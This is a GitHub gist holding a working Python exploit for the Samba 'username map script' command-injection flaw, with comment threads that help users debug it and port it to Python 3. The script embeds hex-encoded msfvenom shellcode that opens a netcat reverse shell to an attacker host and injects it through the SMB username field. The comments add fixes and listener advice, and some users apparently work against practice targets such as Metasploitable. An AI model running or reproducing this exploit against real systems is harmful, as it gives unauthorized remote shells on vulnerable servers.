Skip to content

Instantly share code, notes, and snippets.

@joenorton8014
Created August 19, 2017 12:35
  • Star 17 You must be signed in to star a gist
  • Fork 13 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save joenorton8014/19aaa00e0088738fc429cff2669b9851 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
@ar0dd
Copy link

ar0dd commented Mar 3, 2019

Works like a charm. Thanks.

@rehamun
Copy link

rehamun commented Sep 4, 2019

could u please clarify how the code ganna recognize the RHOST IP or the URL?

@jeffinm
Copy link

jeffinm commented Feb 26, 2020

Hi
I am getting this error, while running this code. Any idea why?

python samba-usermap-exploit.py

Traceback (most recent call last):
File "samba-usermap-exploit.py", line 4, in
from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

@Anass-bekar
Copy link

Download mysmb.py

@toddjones1984
Copy link

I downloaded impacket and mysmb,py but I'm still getting errors any help would be appreciated.

Traceback (most recent call last):
File "3.0.20.py", line 3, in
from smb.SMBConnection import SMBConnection
File "/opt/smb/impacket/impacket/smb.py", line 49, in
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
acket and mysmb.py and I'm still having issues.

@edenbomb
Copy link

According to : http://http.kali.org/kali/pool/main/p/pysmb/
when we try to install smb for python2 it will be error due to file not found.
So I would like to suggest for editing
Old :
print "\nUsage: " + sys.argv[0] + " \n"
New :
print ("\nUsage: " + sys.argv[0] + " \n")

and using python3 instead.

Remark :
Command install ==> sudo sudo apt-get install -y python3-smb

@CybertSys
Copy link

There's an encoding issue. I know what needs to happen but I'm unsure of the syntax.

username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

@ghost-ng
Copy link

A tip, stick with python2, pip install pysmb still works...this exploit is the simplest they come.

@Anonimo501
Copy link

Anonimo501 commented May 30, 2021

hi.

despues de varios errores instale pip install pysmb y luego corregi el error de print " colocando el paréntesis ("") luego de hacer todo esto pude ejecutar el exploit pero luego salio un nuevo problema que es el siguiente:

python samba-usermap-exploit.py 192.168.1.70
Traceback (most recent call last):
File "/home/botache/samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 127, in connect
self._pollForNetBIOSPacket(timeout)
File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 600, in _pollForNetBIOSPacket
raise SMBTimeout
smb.base.SMBTimeout

si alguien sabe la solucion a esto le agradezco.
un saludo y gracias.

ok regresando me doy cuenta que hay que crear el payload uno mismo con el comando: msfvenom -p cmd/unix/reverse_netcat LHOST=ipatacante LPORT=4444 -f python

pero luego de generarlo e intentar de nuevo enviando el ataque me sale lo siguiente:
Traceback (most recent call last):
File "/home/botache/samba-usermap-exploit.py", line 38, in
username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

aun no resuelvo o no encuentro la solucion para ello, si alguien puede ayudar muchas gracias.

@Mohammed-Aljohani
Copy link

to run this script successfully, follow the below steps:
1- sudo pip install pysmb
2- Add parentheses in print function because we will use python3, so will be like this: print ("\nUsage: " + sys.argv[0] + " \n")
3- since can't concatenate str (not "bytes") to str, we will decode our byte in line 38 then concatenate , so will be like this: username = "/=nohup " + buf.decode + ""

@cybertuxh4xor
Copy link

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

@WorksWellWithOthers
Copy link

WorksWellWithOthers commented Mar 26, 2022

could u please clarify how the code ganna recognize the RHOST IP or the URL?

The command-line argument passed when calling this script sets the RHOST IP:
assert conn.connect(sys.argv[1], 445)

Running this on the command line generates a new shellcode for you to replace the variable buf with. The LHOST is declared there.
msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python

@WorksWellWithOthers
Copy link

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯ Traceback (most recent call last): File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in assert conn.connect(sys.argv[1], 445) AssertionError

Do you have a listener running at port 445?

Try running a listener before attempting this script:
nc -nvlp 445

@polaris430
Copy link

folks using msf6 make sure lhosts = tun0 interface ip address else it won't work

@anonedez
Copy link

hello dear friends, please help me :)

python SambaExploit.py 10.0.2.12
Traceback (most recent call last):
File "/root/Desktop/SambaExploit.py", line 39, in
assert conn.connect(sys.argv[1], 445)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/smb/SMBConnection.py", line 120, in connect
self.sock = socket.create_connection(( ip, port ), timeout = timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 851, in create_connection
raise exceptions[0]
File "/usr/lib/python3.11/socket.py", line 836, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

what should i do ?

@anonedez
Copy link

olks using msf6 make sure lhosts = tun0 interface ip address else it won't work

okay bro, what can i do ?

@ghost-ng
Copy link

that error just says you cant connect with the target, either the target is offline or not responding on that port.

@anonedez
Copy link

to run this script successfully, follow the below steps: 1- sudo pip install pysmb 2- Add parentheses in print function because we will use python3, so will be like this: print ("\nUsage: " + sys.argv[0] + " \n") 3- since can't concatenate str (not "bytes") to str, we will decode our byte in line 38 then concatenate , so will be like this: username = "/=nohup " + buf.decode + ""

help please

@ghost-ng
Copy link

@anonedez
Copy link

like i said above, use python2 to avoid making these modifications

How can I use python 2? I am new to cyber security. This is why I don't understand much.

@anonedez
Copy link

anonedez commented Feb 10, 2024 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment